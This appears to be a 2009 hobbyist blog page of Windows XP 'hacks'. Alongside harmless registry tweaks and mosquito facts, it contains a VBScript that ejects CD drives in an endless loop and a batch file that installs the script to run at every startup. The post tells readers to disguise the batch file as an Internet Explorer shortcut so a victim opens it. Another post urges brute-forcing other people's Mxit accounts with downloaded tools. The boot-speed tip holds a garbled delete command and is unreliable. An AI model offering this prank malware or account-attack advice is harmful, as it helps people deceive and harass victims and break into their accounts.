Search
Thursday, March 26, 2009
Boot, Start and Run WINDOWS XP to an ultimate speed
1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.
WindowsXP should now boot REALLY faster.
CD ROM HACK
set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
Now this is funny but what if it was even funnier. What if every time you started your computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.
1. Copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2. CDfun.vbs
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.
It will assist me to provide you with better hacks.
Make yourself less attractive to mosquitoes
Ever wonder why a mosquito is attracted to you?
It's an interesting fact :) N'joy
Mosquitoes are attracted to us through the carbon dioxide (CO2) we exhale when we breathe. The production of C02 production varies from body to body based on its metabolic rate; those bodies with high metabolism tend to burn more C02 and are therefore more attractive to mosquitoes.
Mosquitoes are also attracted to lactic acid, which our bodies release after a workout or after eating salty and high-potassium foods. That would be bananas, pickles, potato chips and other snack foods.
Women are more attractive to mosquitoes than men because they like estrogen-based female hormones and the fruity and floral fragrances found in perfumes and bodycare products women use. But men may also carry these fragrances from scented sunscreens, fabric softeners and dryer sheets.
Mosquitoes prefer moist, cool bodies, wet from rain, perspiration or swimming.
They also like diabetics--yes, their blood is sweeter, but it's the high level of acetone in the blood mosquitoes love.
And if you are wearing light-colored clothing, particularly yellow, a mosquito will zoom right in on you.
So, to make your body unattractive to mosquitoes:
- eat less salt
- use unscented products
- dry off your body
- avoid sweets
- wear dark colors
Monday, March 16, 2009
MIXIT HACK
People are also interested in the hacks of Mxit but have not been able to expresss there needs well to me. I recommend you to use my knowledge only for educational purposes. Hacking is illegal and I will not be held responsible for any type of problem that occurs while hacking, you will be responsible for your acts!
Tools such as iNFRAD3AD and others have been succesful in hacking Mxit, but are now not available in Internet. Therefore there is only one way in hacking the numbers of people i.e. through brute force attack.
(Brute force attack is a method of defeating a scheme by systematically trying a large number of possibilities; for example, a large number of the possible keys in a key space in order to decrypt a message. In most schemes, the theoretical possibility of a brute force attack is recognized, but it is set up in such a way that it would be computationally infeasible to carry out. )
YOU CAN DOWNLOAD MXIT FROM HERE : http://www.mxit.com/mxitpc/
YOU MAY DOWNLOAD BRUTE FORCE ATTACK OF YOUR CHOICE FROM INTERNET AVAILABLE IN BUNDLES.
My recommendation is : http://www.download.com
So use brute force and try your luck :)
Thanks for the question Genius!
Monday, March 2, 2009
Customize Internet. Explorer Title bar tip:
Thanking you!
BE IN TOUCH WITH MY WEBSITE TO KNOW MORE NEW THINGS GOING AROUND THE WORLD OF HACKING!
I have seen many people from Santa Clara, California, Dublin, Oslo, Delhi-India, Redlands, CA visiting my website! I thank you too guys for visiting my website!
KEEP ON CHECKING THIS WEBSITES FOR MORE UPDATES!
Adding options in right click! Check It out!
Till the time I make changes to my website you should check out this new hack!
Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path.
First we will add the copy and move options to the right click menu of all FILES.
CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers
Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.
You should now have two new subkeys under the ContextMenuHandlers key:
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers\Move To
Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
Next , select the Move To key and in the right hand pane set the default value to:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:
HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers
Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.
left click on the right hand pane, add the same default values as you did for Files:
For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}
Exit the registry and you are done.
Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder